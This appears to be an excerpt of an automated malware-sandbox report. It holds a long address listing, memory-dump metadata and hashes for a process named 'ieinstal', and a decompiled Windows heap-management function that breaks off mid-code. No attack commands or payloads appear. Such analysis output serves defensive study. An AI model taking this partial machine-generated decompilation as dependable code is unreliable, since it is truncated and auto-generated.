                                                                                                                0x1e65c09d
                                                                                                                0x1e65c09e
                                                                                                                0x1e65c0af
                                                                                                                0x1e65c0b1
                                                                                                                0x1e65c0b7
                                                                                                                0x1e65c0be
                                                                                                                0x1e65c0c3
                                                                                                                0x1e65c0c5
                                                                                                                0x1e65c5d4
                                                                                                                0x1e65c5db
                                                                                                                0x1e65c5e4
                                                                                                                0x1e65c5ed
                                                                                                                0x1e65c5f8
                                                                                                                0x1e65c5f8
                                                                                                                0x1e65c0cb
                                                                                                                0x1e65c0d2
                                                                                                                0x1e65c604
                                                                                                                0x1e65c60a
                                                                                                                0x1e65c60c
                                                                                                                0x00000000
                                                                                                                0x1e65c0d8
                                                                                                                0x1e65c0de
                                                                                                                0x1e65c0e4
                                                                                                                0x1e65c0f1
                                                                                                                0x1e65c0f1
                                                                                                                0x1e65c0f7
                                                                                                                0x1e65c55d
                                                                                                                0x1e65c563
                                                                                                                0x1e65c566
                                                                                                                0x1e65c566
                                                                                                                0x1e65c569
                                                                                                                0x1e65c56c
                                                                                                                0x1e65c56c
                                                                                                                0x1e65c575
                                                                                                                0x1e65c587
                                                                                                                0x1e65c58d
                                                                                                                0x1e65c58f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e65c57e
                                                                                                                0x1e65c582
                                                                                                                0x1e65c584
                                                                                                                0x1e65c584
                                                                                                                0x00000000
                                                                                                                0x1e65c584
                                                                                                                0x00000000
                                                                                                                0x1e65c582
                                                                                                                0x1e65c597
                                                                                                                0x1e65c599
                                                                                                                0x1e6b3a4c
                                                                                                                0x00000000
                                                                                                                0x1e65c59f
                                                                                                                0x1e65c59f
                                                                                                                0x1e65c5a1
                                                                                                                0x1e65c5b3
                                                                                                                0x1e65c5b8
                                                                                                                0x00000000
                                                                                                                0x1e65c5b8
                                                                                                                0x1e65c0fd
                                                                                                                0x1e65c0fd
                                                                                                                0x1e65c103
                                                                                                                0x1e65c10b
                                                                                                                0x1e65c110
                                                                                                                0x1e65c112
                                                                                                                0x1e65c171
                                                                                                                0x1e65c17e
                                                                                                                0x1e65c183
                                                                                                                0x1e65c185
                                                                                                                0x1e65c1ca
                                                                                                                0x1e65c1ca
                                                                                                                0x1e65c1d0
                                                                                                                0x1e65c206
                                                                                                                0x1e65c208
                                                                                                                0x1e65c20e
                                                                                                                0x1e65c214
                                                                                                                0x1e65c35c
                                                                                                                0x1e65c362
                                                                                                                0x1e65c368
                                                                                                                0x1e65c374
                                                                                                                0x1e65c387
                                                                                                                0x1e65c38c
                                                                                                                0x1e65c38e
                                                                                                                0x1e65c39b
                                                                                                                0x1e65c3a0
                                                                                                                0x1e65c3a6
                                                                                                                0x1e65c3ac
                                                                                                                0x1e65c3ae
                                                                                                                0x1e65c3b0
                                                                                                                0x1e65c3b0
                                                                                                                0x1e65c3b0
                                                                                                                0x1e65c3b2
                                                                                                                0x1e65c3b5
                                                                                                                0x1e65c4c6
                                                                                                                0x1e65c3bb
                                                                                                                0x1e65c3bb
                                                                                                                0x1e65c3bb
                                                                                                                0x1e65c3c1
                                                                                                                0x1e65c3c7
                                                                                                                0x1e65c3cd
                                                                                                                0x1e65c3cf
                                                                                                                0x1e65c3d1
                                                                                                                0x1e65c3d1
                                                                                                                0x1e65c3d1
                                                                                                                0x1e65c3d3
                                                                                                                0x1e65c3d6
                                                                                                                0x1e65c4d1
                                                                                                                0x1e65c4db
                                                                                                                0x1e65c3dc
                                                                                                                0x1e65c3dc
                                                                                                                0x1e65c3dc
                                                                                                                0x1e65c421
                                                                                                                0x1e65c427
                                                                                                                0x1e65c42d
                                                                                                                0x1e65c433
                                                                                                                0x1e65c435
                                                                                                                0x1e65c437
                                                                                                                0x1e65c437
                                                                                                                0x1e65c437
                                                                                                                0x1e65c439
                                                                                                                0x1e65c43c
                                                                                                                0x1e65c4e6
                                                                                                                0x1e65c4ec
                                                                                                                0x1e65c442
                                                                                                                0x1e65c442
                                                                                                                0x1e65c442
                                                                                                                0x1e65c448
                                                                                                                0x1e65c448
                                                                                                                0x1e65c454
                                                                                                                0x1e65c45a
                                                                                                                0x1e6b3b4c
                                                                                                                0x1e6b3b4c
                                                                                                                0x1e65c21a
                                                                                                                0x1e65c21a
                                                                                                                0x1e65c220
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e65c220
                                                                                                                0x1e65c226
                                                                                                                0x1e65c22d
                                                                                                                0x1e65c22f
                                                                                                                0x1e65c235
                                                                                                                0x1e65c4a7
                                                                                                                0x1e65c4b4
                                                                                                                0x1e65c4b9
                                                                                                                0x1e65c4bb
                                                                                                                0x1e6b3b56
                                                                                                                0x1e6b3b5c
                                                                                                                0x1e6b3b62
                                                                                                                0x1e6b3b64
                                                                                                                0x1e6b3b67
                                                                                                                0x1e6b3b67
                                                                                                                0x1e6b3b6a
                                                                                                                0x1e6b3b6d
                                                                                                                0x1e6b3b6d
                                                                                                                0x1e6b3b72
                                                                                                                0x1e6b3b72
                                                                                                                0x1e6b3b74
                                                                                                                0x1e6b3b79
                                                                                                                0x1e6b3b85
                                                                                                                0x1e6b3b98
                                                                                                                0x1e6b3bab
                                                                                                                0x1e6b3bbc
                                                                                                                0x1e6b3bce
                                                                                                                0x1e6b3c0e
                                                                                                                0x00000000
                                                                                                                0x1e6b3c0e
                                                                                                                0x1e65c23b
                                                                                                                0x1e65c23b
                                                                                                                0x1e65c241
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e65c241
                                                                                                                0x1e65c235
                                                                                                                0x1e65c187
                                                                                                                0x1e65c19b
                                                                                                                0x1e65c1a1
                                                                                                                0x1e65c1a6
                                                                                                                0x1e65c1ac
                                                                                                                0x1e65c1b1
                                                                                                                0x1e6b3a71
                                                                                                                0x1e6b3a76
                                                                                                                0x1e6b3a7c
                                                                                                                0x1e6b3a7e
                                                                                                                0x00000000
                                                                                                                0x1e6b3a84
                                                                                                                0x1e6b3a9d
                                                                                                                0x00000000
                                                                                                                0x1e6b3a9d
                                                                                                                0x00000000
                                                                                                                0x1e65c1b7
                                                                                                                0x1e65c1b7
                                                                                                                0x1e65c1b7
                                                                                                                0x1e65c1b7
                                                                                                                0x1e65c1bd
                                                                                                                0x1e65c1bd
                                                                                                                0x1e65c1c4
                                                                                                                0x1e6b3ab0
                                                                                                                0x1e6b3ab5
                                                                                                                0x1e6b3ab7
                                                                                                                0x00000000
                                                                                                                0x1e6b3abd
                                                                                                                0x1e6b3af4
                                                                                                                0x1e6b3af6
                                                                                                                0x1e6b3afc
                                                                                                                0x1e6b3afe
                                                                                                                0x1e6b3b18
                                                                                                                0x1e6b3b1e
                                                                                                                0x1e6b3b3c
                                                                                                                0x1e6b3b3c
                                                                                                                0x00000000
                                                                                                                0x1e6b3b00
                                                                                                                0x1e6b3b0e
                                                                                                                0x1e6b3b0e
                                                                                                                0x1e6b3afe
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e65c1c4
                                                                                                                0x1e65c114
                                                                                                                0x1e65c11a
                                                                                                                0x1e65c125
                                                                                                                0x1e65c140
                                                                                                                0x1e65c145
                                                                                                                0x1e65c147
                                                                                                                0x1e6b3a56
                                                                                                                0x1e6b3c10
                                                                                                                0x1e6b3c10
                                                                                                                0x1e65c14d
                                                                                                                0x1e65c15b
                                                                                                                0x1e65c16c
                                                                                                                0x00000000
                                                                                                                0x1e65c16c
                                                                                                                0x1e65c147
                                                                                                                0x1e65c112
                                                                                                                0x1e65c0f7
                                                                                                                0x1e65c0d2
                                                                                                                0x1e65c068
                                                                                                                0x1e65c038
                                                                                                                0x1e65c247
                                                                                                                0x1e65c247
                                                                                                                0x1e65c24e
                                                                                                                0x1e65c465
                                                                                                                0x1e65c465
                                                                                                                0x1e65c254
                                                                                                                0x1e65c256
                                                                                                                0x1e65c471
                                                                                                                0x1e65c477
                                                                                                                0x1e6b3c1b
                                                                                                                0x1e6b3c1b
                                                                                                                0x1e65c47d
                                                                                                                0x1e65c47d
                                                                                                                0x1e65c483
                                                                                                                0x00000000
                                                                                                                0x1e65c489
                                                                                                                0x1e65c489
                                                                                                                0x1e65c48f
                                                                                                                0x00000000
                                                                                                                0x1e65c495
                                                                                                                0x00000000
                                                                                                                0x1e65c495
                                                                                                                0x1e65c48f
                                                                                                                0x1e65c483
                                                                                                                0x1e65c25c
                                                                                                                0x1e65c25c
                                                                                                                0x1e65c25c
                                                                                                                0x1e65c25c
                                                                                                                0x00000000
                                                                                                                0x1e65c256
                                                                                                                0x1e65bf91
                                                                                                                0x1e65bef2
                                                                                                                0x1e65bef2
                                                                                                                0x1e65bef5
                                                                                                                0x1e65bef7
                                                                                                                0x1e65beff
                                                                                                                0x1e65bf07
                                                                                                                0x1e65bf07
                                                                                                                0x1e65bf09
                                                                                                                0x1e65bf0f
                                                                                                                0x1e65bf16
                                                                                                                0x1e65bf18
                                                                                                                0x1e65bf1b
                                                                                                                0x1e65bf27
                                                                                                                0x1e65bf27
                                                                                                                0x1e65bef0
                                                                                                                0x1e65bee8
                                                                                                                0x1e65becd
                                                                                                                0x1e65bebf
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $$.mui$.mun$SystemResources\
                                                                                                                • API String ID: 0-3047833772
                                                                                                                • Opcode ID: 032c5ba195ee912538be788903ee7e018bd055c36ce2b6f9f1f5f70faf46c517
                                                                                                                • Instruction ID: d1a8a4b15610d934a50a5bb631937a0eb7c8fd0d300890abbfe57f8976eaddba
                                                                                                                • Opcode Fuzzy Hash: 032c5ba195ee912538be788903ee7e018bd055c36ce2b6f9f1f5f70faf46c517
                                                                                                                • Instruction Fuzzy Hash: 08623972B013699ECB25CF54CC40BD9B7B9BF0A350F8446EAE409A7A54D731AE84CF52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E663C60 Relevance: 5.4, Strings: 3, Instructions: 1603COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E1E663C60(signed char __ecx, signed int _a4, intOrPtr _a8) {
				signed short _v8;
				signed int _v12;
				char _v20;
				signed char _v32;
				signed int _v36;
				char _v37;
				char _v38;
				signed int _v44;
				signed short _v48;
				signed char _v52;
				signed char _v56;
				char _v60;
				short _v64;
				signed int _v72;
				signed short _v76;
				signed int _v80;
				signed int _v84;
				char _v85;
				char _v86;
				signed int _v92;
				signed int _v96;
				signed short _v100;
				signed short* _v104;
				signed char _v105;
				signed short _v108;
				signed short _v110;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed short _v128;
				signed short _v132;
				signed short _v136;
				signed int _v140;
				signed int _v144;
				signed short _v148;
				unsigned int _v152;
				signed short _v156;
				signed int _v160;
				signed int _v164;
				signed short _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v196;
				unsigned int* _v200;
				signed int _v204;
				signed int _v208;
				signed short _v212;
				signed char _v216;
				signed int _v224;
				signed int _v228;
				intOrPtr _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				intOrPtr _v264;
				unsigned int _v276;
				unsigned int _v284;
				signed short _v292;
				signed short _v300;
				signed int _v308;
				signed short _v316;
				signed short _v324;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t686;
				signed int _t692;
				signed char* _t693;
				signed char _t694;
				void* _t697;
				signed int _t700;
				char* _t701;
				signed int _t704;
				signed char* _t705;
				signed int _t706;
				signed char* _t707;
				signed int _t709;
				signed int _t712;
				signed char* _t713;
				intOrPtr _t722;
				signed int _t723;
				signed char* _t724;
				signed int _t738;
				signed int _t743;
				intOrPtr* _t760;
				signed char _t761;
				signed int* _t768;
				signed int _t777;
				signed int* _t778;
				signed int _t782;
				intOrPtr _t788;
				intOrPtr _t790;
				signed char _t798;
				intOrPtr _t801;
				signed short* _t802;
				signed int* _t805;
				unsigned int* _t812;
				signed int _t815;
				signed int _t817;
				signed int _t820;
				signed int _t842;
				signed char _t853;
				signed short _t854;
				void* _t855;
				signed short* _t858;
				signed int _t861;
				signed int _t865;
				intOrPtr _t871;
				signed int _t875;
				signed int _t878;
				signed int _t879;
				signed int _t880;
				signed char _t882;
				signed int _t884;
				signed char _t885;
				intOrPtr* _t897;
				intOrPtr* _t900;
				signed int _t903;
				intOrPtr _t909;
				signed int _t913;
				signed int _t919;
				signed int _t923;
				signed char _t930;
				intOrPtr* _t931;
				intOrPtr _t932;
				signed int _t935;
				signed int _t941;
				intOrPtr _t947;
				signed int _t951;
				signed int _t954;
				signed int _t955;
				signed char _t957;
				signed short _t959;
				signed char _t960;
				signed char _t961;
				unsigned int _t968;
				signed char _t970;
				signed int _t979;
				signed int _t980;
				signed char _t984;
				signed int _t986;
				signed int _t987;
				signed int _t988;
				signed int _t998;
				intOrPtr _t1009;
				void* _t1015;
				void* _t1018;
				signed int _t1019;
				signed int _t1020;
				signed short _t1023;
				signed int _t1025;
				signed short _t1026;
				signed int _t1027;
				unsigned int _t1030;
				signed short _t1033;
				signed int _t1034;
				unsigned int _t1038;
				signed char _t1045;
				signed char _t1047;
				signed int _t1050;
				signed short _t1051;
				signed int _t1053;
				intOrPtr _t1056;
				signed int _t1058;
				signed int _t1060;
				signed int _t1061;
				signed int _t1063;
				signed int _t1069;
				signed int _t1071;
				signed int _t1087;
				signed short* _t1088;
				intOrPtr _t1089;
				signed int _t1091;
				signed short _t1092;
				signed char _t1093;
				signed short _t1095;
				signed int _t1096;
				intOrPtr _t1097;
				intOrPtr* _t1110;
				intOrPtr _t1111;
				signed char _t1113;
				intOrPtr _t1114;
				signed int _t1119;
				signed char _t1124;
				signed int _t1131;
				signed int _t1132;
				intOrPtr _t1133;
				intOrPtr* _t1135;
				signed char _t1136;
				signed short _t1138;
				intOrPtr _t1140;
				signed int _t1146;
				signed int _t1150;
				signed short _t1152;
				signed int _t1154;
				signed int _t1160;
				signed char _t1164;
				signed char _t1166;
				intOrPtr _t1169;
				signed short* _t1173;
				signed char _t1175;
				signed int _t1176;
				signed int _t1177;
				signed int _t1187;
				signed int _t1188;
				void* _t1189;
				signed int _t1191;
				signed short _t1195;
				signed int _t1196;
				signed int _t1197;
				intOrPtr* _t1199;
				signed int* _t1202;
				intOrPtr _t1203;
				signed int _t1205;
				signed short _t1214;
				signed int _t1215;
				signed int _t1217;
				signed int _t1219;
				intOrPtr* _t1224;
				intOrPtr _t1226;
				signed int _t1228;
				unsigned int _t1232;
				signed int _t1238;
				signed int _t1239;
				signed int _t1240;
				unsigned int _t1242;
				signed short _t1247;
				signed int _t1249;
				unsigned int _t1252;
				intOrPtr* _t1255;
				signed int _t1257;
				unsigned int _t1267;
				signed int _t1270;
				signed char _t1271;
				signed int _t1274;
				signed int _t1275;
				signed int _t1286;
				signed char _t1287;
				signed int _t1288;
				void* _t1290;
				signed int _t1291;
				signed int _t1292;
				signed char _t1293;
				signed int _t1294;
				signed int _t1295;
				signed int _t1298;
				signed int _t1300;
				signed int _t1301;
				signed int _t1302;
				signed int _t1303;
				signed short* _t1304;
				signed short _t1305;
				signed int _t1308;
				signed int _t1309;
				intOrPtr _t1310;
				signed int _t1311;
				signed short _t1312;
				signed short _t1314;
				signed short _t1317;
				intOrPtr _t1318;
				signed int _t1319;
				signed int _t1322;
				void* _t1323;
				void* _t1324;
				void* _t1327;
				void* _t1328;

				_t1037 = __ecx;
				_push(0xfffffffe);
				_push(0x1e72c1a8);
				_push(E1E69AD20);
				_push( *[fs:0x0]);
				_t1324 = _t1323 - 0x130;
				_push(_t1018);
				_t686 =  *0x1e74b370;
				_v12 = _v12 ^ _t686;
				_push(_t686 ^ _t1322);
				 *[fs:0x0] =  &_v20;
				_t1280 = __ecx;
				_v216 = __ecx;
				_v37 = 1;
				_v38 = 0;
				_v136 = 0;
				_v156 = 1;
				_v92 = 0;
				_v116 = 0;
				_v148 = 0;
				_v64 = 0;
				_t690 = _a4;
				if(__ecx != _a4) {
					_t1188 = _t1187 |  *(__ecx + 0x44);
					_v56 = _t1188;
					__eflags = _t1188 & 0x7d010f60;
					if((_t1188 & 0x7d010f60) == 0) {
						_t1285 = 3;
						L7:
						_t692 =  *( *[fs:0x30] + 0x50);
						__eflags = _t692;
						if(_t692 == 0) {
							L10:
							_t693 = 0x7ffe0380;
						} else {
							__eflags =  *_t692;
							if( *_t692 == 0) {
								goto L10;
							} else {
								_t693 =  *( *[fs:0x30] + 0x50) + 0x226;
							}
						}
						__eflags =  *_t693;
						if( *_t693 == 0) {
							L15:
							_t1019 = _a4;
						} else {
							_t1009 =  *[fs:0x30];
							__eflags =  *(_t1009 + 0x240) & 0x00000001;
							if(( *(_t1009 + 0x240) & 0x00000001) == 0) {
								goto L15;
							} else {
								_t1019 = _a4;
								_t1037 =  *(_t1280 + 0x4c) >> 0x00000011 &  *(_t1280 + 0x52) & 0x000000ff ^  *(_t1019 + 2) & 0x000000ff;
								__eflags = _t1037 & 0x00000008;
								if((_t1037 & 0x00000008) == 0) {
									_t1037 = _t1280;
									E1E70F247(_t1037, _a8, _t1285);
									_t1188 = _v56;
								}
							}
						}
						_v8 = 0;
						__eflags = _t1188 & 0x00000001;
						if(__eflags != 0) {
							__eflags =  *(_t1280 + 0x4c);
							if( *(_t1280 + 0x4c) != 0) {
								 *_t1019 =  *_t1019 ^  *(_t1280 + 0x50);
								__eflags =  *(_t1019 + 3) - ( *(_t1019 + 2) ^  *(_t1019 + 1) ^  *_t1019);
								if(__eflags != 0) {
									_push(_t1037);
									E1E70D646(_t1019, _t1280, _t1019, _t1280, _t1285, __eflags);
								}
							}
							L42:
							_t1286 = _t1019 + 2;
							_t694 =  *_t1286;
							__eflags = _t694 & 0x00000008;
							if((_t694 & 0x00000008) != 0) {
								_t988 = _t694 & 0x000000f7;
								__eflags = _t988;
								 *_t1286 = _t988;
							}
							__eflags =  *((char*)(_t1019 + 7)) - 4;
							if( *((char*)(_t1019 + 7)) == 4) {
								_t1020 = _t1019 + 0xffffffe8;
								_v92 = _t1020;
								_t1038 =  *(_t1020 + 0x10);
								_v152 = _t1038;
								_v116 = _t1020 & 0xffff0000;
								 *((intOrPtr*)(_t1280 + 0x200)) =  *((intOrPtr*)(_t1280 + 0x200)) - _t1038;
								_t697 =  *_t1020;
								_t1039 =  *(_t1020 + 4);
								_t1189 =  *_t1039;
								_t1287 =  *(_t697 + 4);
								__eflags = _t1189 - _t1287;
								if(_t1189 != _t1287) {
									L320:
									__eflags = 0;
									_t1039 = 0xd;
									E1E715FED(0xd, 0, _t1020, _t1287, _t1189, 0);
								} else {
									__eflags = _t1189 - _t1020;
									if(_t1189 != _t1020) {
										goto L320;
									} else {
										 *_t1039 = _t697;
										 *(_t697 + 4) = _t1039;
									}
								}
								__eflags = _v37;
								if(_v37 == 0) {
									_t738 =  *( *[fs:0x30] + 0x68);
									_v260 = _t738;
									__eflags = _t738 & 0x00000800;
									if((_t738 & 0x00000800) != 0) {
										__eflags =  *(_t1020 + 0x10) >> 3;
										_t1039 = _t1280;
										E1E6F9AFE(_t1280,  *((intOrPtr*)(_v92 + 0xa)),  *(_t1020 + 0x10) >> 3, 0, 3);
									}
								}
								_t1288 = 0;
								_a4 = 0;
								__eflags = _v38;
								if(_v38 != 0) {
									_push( *(_t1280 + 0xc8));
									E1E65E740(_t1039);
									_v38 = 0;
								}
								_t1021 =  *(_v92 + 0x14);
								_v148 =  *(_v92 + 0x14);
								_t700 = E1E663C40();
								__eflags = _t700;
								if(_t700 == 0) {
									_t701 = 0x7ffe0388;
								} else {
									_t701 =  *( *[fs:0x30] + 0x50) + 0x22e;
									_t1288 = _a4;
									_t1021 = _v148;
								}
								__eflags =  *_t701;
								if( *_t701 != 0) {
									E1E70DA30(_t1021, _t1280, _v116, _t1021);
								}
								_v48 = 0;
								_t1191 =  &_v116;
								_v264 = E1E64FABA(_t1191,  &_v48, 0x8000);
								_t704 = E1E663C40();
								__eflags = _t704;
								if(_t704 == 0) {
									_t705 = 0x7ffe0380;
								} else {
									_t705 =  *( *[fs:0x30] + 0x50) + 0x226;
									_t1288 = _a4;
								}
								__eflags =  *_t705;
								if( *_t705 != 0) {
									_t722 =  *[fs:0x30];
									__eflags =  *(_t722 + 0x240) & 0x00000001;
									if(( *(_t722 + 0x240) & 0x00000001) != 0) {
										_t723 = E1E663C40();
										__eflags = _t723;
										if(_t723 == 0) {
											_t724 = 0x7ffe0380;
										} else {
											_t724 =  *( *[fs:0x30] + 0x50) + 0x226;
										}
										__eflags =  *(_t1280 + 0x74) << 3;
										_t1191 = _v92;
										E1E70F058(_t1021, _t1280, _t1191,  *(_t1280 + 0x74) << 3, _v152,  *(_t1280 + 0x74) << 3, 0, 0,  *_t724 & 0x000000ff);
									}
									_t1288 = _a4;
								}
								_t706 = E1E663C40();
								__eflags = _t706;
								if(_t706 == 0) {
									_t707 = 0x7ffe038a;
								} else {
									_t707 =  *( *[fs:0x30] + 0x50) + 0x230;
									_t1288 = _a4;
								}
								__eflags =  *_t707;
								if( *_t707 != 0) {
									_t712 = E1E663C40();
									__eflags = _t712;
									if(_t712 == 0) {
										_t713 = 0x7ffe038a;
									} else {
										_t713 =  *( *[fs:0x30] + 0x50) + 0x230;
										_t1288 = _a4;
									}
									__eflags =  *(_t1280 + 0x74) << 3;
									_t1191 = _v92;
									E1E70F058(_t1021, _t1280, _t1191,  *(_t1280 + 0x74) << 3, _v152,  *(_t1280 + 0x74) << 3, 0, 0,  *_t713 & 0x000000ff);
								}
								_t709 = _v48 >> 3;
								__eflags = _t709;
								_v212 = _t709;
								goto L350;
							} else {
								_t743 =  *_t1019 & 0x0000ffff;
								__eflags = _t743 -  *((intOrPtr*)(_t1280 + 0xf0));
								if(_t743 <  *((intOrPtr*)(_t1280 + 0xf0))) {
									_t1271 =  *((intOrPtr*)((_t743 >> 3) + _t1280 + 0xf2));
									_t984 = 1 << (_t743 & 0x00000007);
									_t1019 = _a4;
									__eflags = _t1271 & _t984;
									if((_t1271 & _t984) == 0) {
										_t1173 =  *((intOrPtr*)(_t1280 + 0xec)) + ( *_t1019 & 0x0000ffff) * 2;
										_t986 =  *_t1173 & 0x0000ffff;
										__eflags = _t986 - 1;
										if(_t986 > 1) {
											_t987 = _t986 - 1;
											__eflags = _t987;
											 *_t1173 = _t987;
										}
									}
								}
								__eflags = _v37;
								if(_v37 == 0) {
									_t979 =  *( *[fs:0x30] + 0x68);
									_v228 = _t979;
									_t1019 = _a4;
									__eflags = _t979 & 0x00000800;
									if((_t979 & 0x00000800) != 0) {
										_push(2);
										_push(0);
										__eflags =  *_t1286 & 0x00000002;
										if(( *_t1286 & 0x00000002) == 0) {
											_t1166 =  *(_t1019 + 3);
											_v105 = _t1166;
											_t980 =  *_t1019 & 0x0000ffff;
											_t1270 = _t1166 & 0x000000ff;
										} else {
											_t980 =  *_t1019 & 0x0000ffff;
											_t1169 = _t1019 - 8 + _t980 * 8;
											_v232 = _t1169;
											_t1270 =  *((intOrPtr*)(_t1169 + 2));
										}
										_push(_t980);
										_v64 = E1E6F9AFE(_t1280, _t1270);
									}
								}
								_t1195 =  *_t1019 & 0x0000ffff;
								_v48 = _t1195;
								_v212 = _t1195;
								__eflags =  *(_t1280 + 0x40) & 0x00000080;
								if(( *(_t1280 + 0x40) & 0x00000080) == 0) {
									_v60 = 0;
									_v176 = _t1019;
									_t1300 = _t1019 - (( *(_t1280 + 0x54) & 0x0000ffff ^  *(_t1019 + 4) & 0x0000ffff) << 3);
									_v44 = _t1300;
									__eflags = _t1300 - _t1019;
									if(_t1300 != _t1019) {
										_t1131 =  *(_t1280 + 0x4c);
										_t930 = _t1131 >> 0x00000014 &  *(_t1280 + 0x52) ^  *(_t1300 + 2);
										__eflags = _t930 & 0x00000001;
										if((_t930 & 0x00000001) == 0) {
											__eflags = _t1131;
											if(_t1131 != 0) {
												_t1267 =  *(_t1280 + 0x50) ^  *_t1300;
												 *_t1300 = _t1267;
												_t1164 = _t1267 >> 0x00000010 ^ _t1267 >> 0x00000008 ^ _t1267;
												__eflags = _t1267 >> 0x18 - _t1164;
												if(__eflags != 0) {
													_push(_t1164);
													E1E70D646(_t1019, _t1280, _t1300, _t1280, _t1300, __eflags);
												}
											}
											_t1255 = _t1300 + 8;
											_v104 = _t1255;
											_t1132 =  *_t1255;
											_v96 = _t1132;
											_t931 =  *((intOrPtr*)(_t1300 + 0xc));
											_v72 = _t931;
											_t932 =  *_t931;
											_t1133 =  *((intOrPtr*)(_t1132 + 4));
											__eflags = _t932 - _t1133;
											if(_t932 != _t1133) {
												L105:
												E1E715FED(0xd, _t1280, _t1255, _t1133, _t932, 0);
											} else {
												__eflags = _t932 - _t1255;
												if(_t932 != _t1255) {
													goto L105;
												} else {
													 *(_t1280 + 0x74) =  *(_t1280 + 0x74) - ( *_t1300 & 0x0000ffff);
													_t1257 =  *(_t1280 + 0xb4);
													_v32 = _t1257;
													__eflags = _t1257;
													if(_t1257 != 0) {
														_t954 =  *_t1300 & 0x0000ffff;
														_v120 = _t954;
														while(1) {
															__eflags = _t954 -  *(_t1257 + 4);
															if(_t954 <  *(_t1257 + 4)) {
																break;
															}
															_t1160 =  *_t1257;
															__eflags = _t1160;
															if(_t1160 != 0) {
																_t1257 = _t1160;
																_v32 = _t1257;
																continue;
															} else {
																_t954 =  *(_t1257 + 4) - 1;
																__eflags = _t954;
															}
															break;
														}
														_v164 = _t954;
														_v52 = _t954;
														_t1146 = _t954 -  *((intOrPtr*)(_t1257 + 0x14));
														_v80 = _t1146;
														__eflags =  *(_t1257 + 8);
														_t955 = _t1146 + _t1146;
														if( *(_t1257 + 8) == 0) {
															_t955 = _t1146;
														}
														_t1311 = _t955 * 4;
														_v84 = _t1311;
														_t957 =  *((intOrPtr*)(_t1257 + 0x20)) + _t1311;
														_v56 = _t957;
														_v188 =  *_t957;
														 *((intOrPtr*)(_t1257 + 0xc)) =  *((intOrPtr*)(_t1257 + 0xc)) - 1;
														_t959 =  *(_t1257 + 4);
														_v36 = _t959;
														_t1312 = _t959 - 1;
														_v128 = _t1312;
														_t960 = _v52;
														__eflags = _t960 - _t1312;
														_t1300 = _v44;
														if(_t960 == _t1312) {
															_t168 = _t1257 + 0x10;
															 *_t168 =  *(_t1257 + 0x10) - 1;
															__eflags =  *_t168;
														}
														_t170 = _t1300 + 8; // 0x1e69ad28
														__eflags = _v188 - _t170;
														if(_v188 == _t170) {
															_v168 =  *(_t1257 + 4);
															__eflags =  *_t1257;
															if( *_t1257 == 0) {
																_t1317 = _v128;
																_v36 = _t1317;
																_v168 = _t1317;
															}
															_t1314 =  *_v104;
															_v104 =  *((intOrPtr*)(_t1257 + 0x18));
															__eflags = _t960 - _v36;
															_t1150 = _v80;
															if(_t960 >= _v36) {
																_t961 = _v56;
																__eflags = _t1314 - _v104;
																if(_t1314 == _v104) {
																	 *_t961 = 0;
																	goto L89;
																} else {
																	 *_t961 = _t1314;
																	goto L83;
																}
																goto L106;
															} else {
																__eflags = _t1314 -  *((intOrPtr*)(_t1257 + 0x18));
																if(_t1314 ==  *((intOrPtr*)(_t1257 + 0x18))) {
																	L88:
																	 *(_v84 +  *((intOrPtr*)(_t1257 + 0x20))) = 0;
																	L89:
																	 *( *((intOrPtr*)(_v32 + 0x1c)) + (_t1150 >> 5) * 4) =  *( *((intOrPtr*)(_v32 + 0x1c)) + (_t1150 >> 5) * 4) &  !(1 << (_t1150 & 0x0000001f));
																} else {
																	_t1152 =  *(_t1314 - 8);
																	_v276 = _t1152;
																	__eflags =  *(_t1280 + 0x4c);
																	if( *(_t1280 + 0x4c) != 0) {
																		_t968 =  *(_t1280 + 0x50) ^ _t1152;
																		_v36 = _t968;
																		_v276 = _t968;
																		_t970 = _v36;
																		__eflags = _t970 >> 0x18 - (_t968 >> 0x00000010 ^ _t968 >> 0x00000008 ^ _t970);
																		if(_t970 >> 0x18 != (_t968 >> 0x00000010 ^ _t968 >> 0x00000008 ^ _t970)) {
																			E1E715FED(3, _t1280, _t1314 - 8, 0, 0, 0);
																			_t1257 = _v32;
																		}
																		_t1152 = _v36;
																	}
																	_t1154 = _v120 - (_t1152 & 0x0000ffff);
																	__eflags = _t1154;
																	_v236 = _t1154;
																	if(_t1154 != 0) {
																		_t1150 = _v80;
																		goto L88;
																	} else {
																		 *(_v84 +  *((intOrPtr*)(_t1257 + 0x20))) = _t1314;
																	}
																}
															}
															L83:
															_t1300 = _v44;
														}
													}
													_t935 = _v96;
													_t1135 = _v72;
													 *_t1135 = _t935;
													 *((intOrPtr*)(_t935 + 4)) = _t1135;
													__eflags =  *(_t1300 + 2) & 0x00000008;
													if(( *(_t1300 + 2) & 0x00000008) == 0) {
														L94:
														_t1136 =  *(_t1300 + 2);
														__eflags = _t1136 & 0x00000004;
														if((_t1136 & 0x00000004) != 0) {
															_t1034 = ( *_t1300 & 0x0000ffff) * 8 - 0x10;
															_v172 = _t1034;
															__eflags = _t1136 & 0x00000002;
															if((_t1136 & 0x00000002) != 0) {
																__eflags = _t1034 - 4;
																if(_t1034 > 4) {
